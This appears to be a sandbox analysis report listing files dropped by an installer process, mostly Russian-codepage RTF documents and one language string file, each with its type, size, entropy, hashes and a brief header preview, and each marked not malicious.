                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \fnil\fcharset134\fprq2{\*\panose 0201
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44111
                                                                                                                                                                                                                                                          Entropy (8bit):5.034804043043812
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jaOfIRlU4LgJAqxAUZa25iMSf3TaCkqooYidqm4eEHEvsEJ5sCXSIKEjZHHuJfM:jap7NkfM
                                                                                                                                                                                                                                                          MD5:D6C4CE3A479398A0C89448CF3D344268
                                                                                                                                                                                                                                                          SHA1:03399F4D355A631C8504B35AA82238E444D2A75E
                                                                                                                                                                                                                                                          SHA-256:56DA26981FD5603C5BB388D63B900EF90B42234F9FA6EA48BC7650BC609CC187
                                                                                                                                                                                                                                                          SHA-512:838AE1B09A693DE3A21C37087192C58F56D1D318A6265DA290CA1AB449DA85716BDD8B0D32B0D6D37EAADEDD2D8B89F31BC1F8A800A28B058286490A4720E9D0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fchar
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):55605
                                                                                                                                                                                                                                                          Entropy (8bit):5.01205567474232
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:joOfxRl14hJboyQZFJiMJu8WjbvMuhisSnPLQStqICnfLrajKyISfle0anZf1L3v:joQxkONkfp
                                                                                                                                                                                                                                                          MD5:2042C1CEA9DAB7F908912F3BFDF63E63
                                                                                                                                                                                                                                                          SHA1:5584A50BCAF968B5EC85B230E9043456D38C8222
                                                                                                                                                                                                                                                          SHA-256:D67F0917369F9D4C556E2F625566C239FEE4DDB6AEF1483DCB2556F23DD3785B
                                                                                                                                                                                                                                                          SHA-512:B0C961BA725096E33D3B586951221A35A77A56D63E0003C301AD30F6D6DB94DF6853124EFE7FE8817F7EEF9F7972434AFC65010885BCE4A9BEFB60D7FF9A5679
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43205
                                                                                                                                                                                                                                                          Entropy (8bit):5.029790593334823
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:joOfYRlj4lmbIWIRV9hiuFfmXYPxz7XzzMVFGqpJzVnz2T8VngbYh8snZHHuJfO:joblNkfO
                                                                                                                                                                                                                                                          MD5:D4CB2191EA1740D821C8C26C19033BE6
                                                                                                                                                                                                                                                          SHA1:3544CFF8E4BCF6BA57A63585AD6DAA2D244DC6D3
                                                                                                                                                                                                                                                          SHA-256:7C075B420A250AC2F36DDAC2834B422FF8B858B0D6E02A9BF7AA5A40FFF6AB39
                                                                                                                                                                                                                                                          SHA-512:D23AB39C0ABA07D99D7F03FAB498C2DADC81247FBC98DD758ABB94413041778BA5A83372F0F5AC20911B1C5F6B61313D6EBA26E966110F482B6B23D3BDAD94CF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44016
                                                                                                                                                                                                                                                          Entropy (8bit):5.032158423293101
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jaOfIRlR4kgJAqxAUZC25iMSf3TIDgE6/o4WGrHwoKkASAt4Nb4B9SZHHuJf5:japUUNkf5
                                                                                                                                                                                                                                                          MD5:CA0B924C577837EAB433DFACF50B0A2B
                                                                                                                                                                                                                                                          SHA1:5FE70BC33A1A72354EB7CFA7327F993383F5CBF3
                                                                                                                                                                                                                                                          SHA-256:62C5D1371C91B454DDE8DF1DB0D628EE59917A766E42475FD17F6EA1E168837F
                                                                                                                                                                                                                                                          SHA-512:A1A20927E1DD4F3F63D8F9D69C23A4C62920C65972B4967BDE5C6FB49EE375B0FD3BC56F57DDB190C267921779A506C42960AA1E9BD7AF979CF6EBB954AD6925
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fchar
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42824
                                                                                                                                                                                                                                                          Entropy (8bit):5.034062607884397
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jFTmHRlU4U7bIWIRV9pqHjiqlO8Dxg+uoH6ewDiUpk8q8l9kSZHHuJfo:jFulNkfo
                                                                                                                                                                                                                                                          MD5:800E7AD84A7B41C281A79786FEA7BA97
                                                                                                                                                                                                                                                          SHA1:994E9061F0AC0F8D5A34B5456B3CB580216F08F6
                                                                                                                                                                                                                                                          SHA-256:6D4DC10220486F098944FBCE97F8B5D03DA6157F7B59F79AF697D60AEDBDAC82
                                                                                                                                                                                                                                                          SHA-512:887318DB58E88701D2B34B7E894EE2132684D0E3C724BC1B6EBA83C5987ECC1D7984018C8915AD0E7EE63E46C8C4258D7F286D2CE804DDFB37289F37676EB5F8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}..{\fbimajor\f31503\fbidi \f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46478
                                                                                                                                                                                                                                                          Entropy (8bit):5.035284697457925
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jFTmHRlr4QogJAqxAUZ81f4igFt5hCteYHIGdLN1Ho3SShcYZVVkiikVi/nuAIRD:jFuqNkfh
                                                                                                                                                                                                                                                          MD5:7EA6627CEC93F45827C17C30BFE21F60
                                                                                                                                                                                                                                                          SHA1:BA5C79789734B4CD143BAAE12DECE8C07FD18427
                                                                                                                                                                                                                                                          SHA-256:6FFBE7F2A89F1128FA7A950F7B1797E2B73E70839FB7EB79EE5B906C50CB8665
                                                                                                                                                                                                                                                          SHA-512:D8C7ED9808A9045B0BE3D247C06F81FB5563F86DAAC704EB1D056AF0799716B6FA0470D81698F28EE72C5B937E0825F1CE42A9F354CA4C61173A0E72DFCB79ED
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}..{\fbimajor\f31503\fbidi \f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38875
                                                                                                                                                                                                                                                          Entropy (8bit):5.023304885435034
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qMF2weYDc4L7bIWIRV9uUwcpanBczRyZHHuJfv:qM3ZxNkfv
                                                                                                                                                                                                                                                          MD5:AA188680DBFDD29FCFD5767CFC4533D9
                                                                                                                                                                                                                                                          SHA1:3CF7AC902EE42B074B4B5ED13E4529FD11A34ADD
                                                                                                                                                                                                                                                          SHA-256:CC3FA96A625899F9221F3E76B6AB9C7B234DC7A4222C914EC9A78A7AA2D64825
                                                                                                                                                                                                                                                          SHA-512:76C22CF016FF8C7C1122E5738FDCF79957D24A4590EAD2FE570CA833D1CF828F8B333CD105B2078AEF2032C503C03BC2536290E5302417D383889045E3B84817
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):27393
                                                                                                                                                                                                                                                          Entropy (8bit):5.064150437041318
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:lBliK0GRTzXqMKGCYv/DOo8eKjHHhSvMonfGQ3R:8KLTz/4WCo8eaHhW7n+QB
                                                                                                                                                                                                                                                          MD5:9087FB9892DDAA830650011299AF2670
                                                                                                                                                                                                                                                          SHA1:FF023B1F38F5B7D093C4F2AAB3470B1575BFA806
                                                                                                                                                                                                                                                          SHA-256:969FC0043D05C76A4FBD148A0087DB9768B62D1DA17212D11A50F0A4A77CCBFC
                                                                                                                                                                                                                                                          SHA-512:D0A9F5FFA8752A01F04B2B61024575E270D53FF5D30180EB4C3FC70C2A5A3D7A794DBE7B596CEC08E0554514D4113C2EC218B3C6533F0B3B952148C46DB8781A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..##############################################################################..# ........! .. ....... ........ ..... ..... .. ..... "="!..##############################################################################..tbStart="....."..tbStartHint="...... ...... ......."..tbStop="...."..tbStopHint="......... ...... ......."..tbFind="....."..tbFindHint="..... .......... . ...."..tbSetting="........."..tbSettingHint="......... ........."..tbAbout=". ......"..tbAboutHint=". ......... / ............... .........."..tbHomePage=".. ...."..tbHomePageHint="....... ........ ........ ........."..tbToday="......."..tbTodayHint="....... . ............ ...."..tbHide="......"..tbHideHint="......... ..... (... ..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50965
                                                                                                                                                                                                                                                          Entropy (8bit):4.9704278921640555
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFkzOc7cskl/VGGAf+E2aiImsQZ/6A91:2aqz+aGIA91
                                                                                                                                                                                                                                                          MD5:B4BB6B054B4A31DE24E87AC030375781
                                                                                                                                                                                                                                                          SHA1:9DFAB2ACC25BA7B468C695E26B953D3E51987121
                                                                                                                                                                                                                                                          SHA-256:B9AB1C6AC6061D9912ACFDF1499C8F4A22D92F950B27BE87BE7B4E0C631EA193
                                                                                                                                                                                                                                                          SHA-512:39CC26F5008F356B8C30551E4B425BCF180662159A308846CD605A5B82E215C63CF5EAEB7A44996E4C39942DDB47FD30AEAF116B671DEA5073E906355244FE2C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49985
                                                                                                                                                                                                                                                          Entropy (8bit):5.016054674805171
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqegxdUjOcPI0QhhiLVptabQhOsWxspoudZdRdud9dWlxjRw4L41PcQhiuOdcJpw:qqH7UnexIA9k
                                                                                                                                                                                                                                                          MD5:6817C14DB33376EA13F5135582FEF07A
                                                                                                                                                                                                                                                          SHA1:AC55EF25E5BA0C63319C2B7750AD3FB3B6141D1D
                                                                                                                                                                                                                                                          SHA-256:8E6A77CDCF0EB74491B22151BCC19798620754E7F069D76227F8C2C1E28778B7
                                                                                                                                                                                                                                                          SHA-512:81B3E721842C1F1CA3581AF69CB6495756EECAFD14385C512E5CEDFAF98BBED387D6B9AB27ED76754B17FFDB8B2E5414108702BD6E5B4A8DA27E821D9D7FF3B6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38593
                                                                                                                                                                                                                                                          Entropy (8bit):5.02789644916169
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4e6xdUjOcPI0QhhiLVpUGXnT9bZhdfGjlrqCHy/RKECA13GPkmZ/6A9S:q4L7UnoIA9S
                                                                                                                                                                                                                                                          MD5:030CBC2FE247F98453B82ABC39C3C966
                                                                                                                                                                                                                                                          SHA1:D5F3102D3878F32C5A5FC7AEE0AF3F63DDB74119
                                                                                                                                                                                                                                                          SHA-256:88E89133FC2542C74552BC4AD65320B01F08ED3A1E5269C008A0236BAF0C0893
                                                                                                                                                                                                                                                          SHA-512:86109DEF32876A40F30B9A4D7D5366BE4FA07D62F3019CC269F3F1A7BD68C2C6597BD2341E0CEAC72951D2B8C66DAEBBE46278ECCAE7CC4D54F32FA9C5B833ED
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42126
                                                                                                                                                                                                                                                          Entropy (8bit):5.024542957132508
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4e94jXjOcPI0QhhiLVtwYMgT+h6asH7UlKBGcg5dEmR7iC//+U1zfymCRwFOcEz:q49OUnwIA92
                                                                                                                                                                                                                                                          MD5:08B4567798ABE579F2D14EA033F94E31
                                                                                                                                                                                                                                                          SHA1:28E3F5CB129DB9B3B33E104773609BF86C8A6861
                                                                                                                                                                                                                                                          SHA-256:2EEB8BAA34230B1D075F9E9C59289BC3B1ACDAB08EF0A181A1FB43F6F3F1BD41
                                                                                                                                                                                                                                                          SHA-512:7F8F5598E931CCCBB0F259AFDF369E7A8FDCBBFE1C222EE8B4D5FF16FE502D4F9BDF54799D3C8420FC5903624DCC7E0412197A067FBA3EF82862ECD491C6F312
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
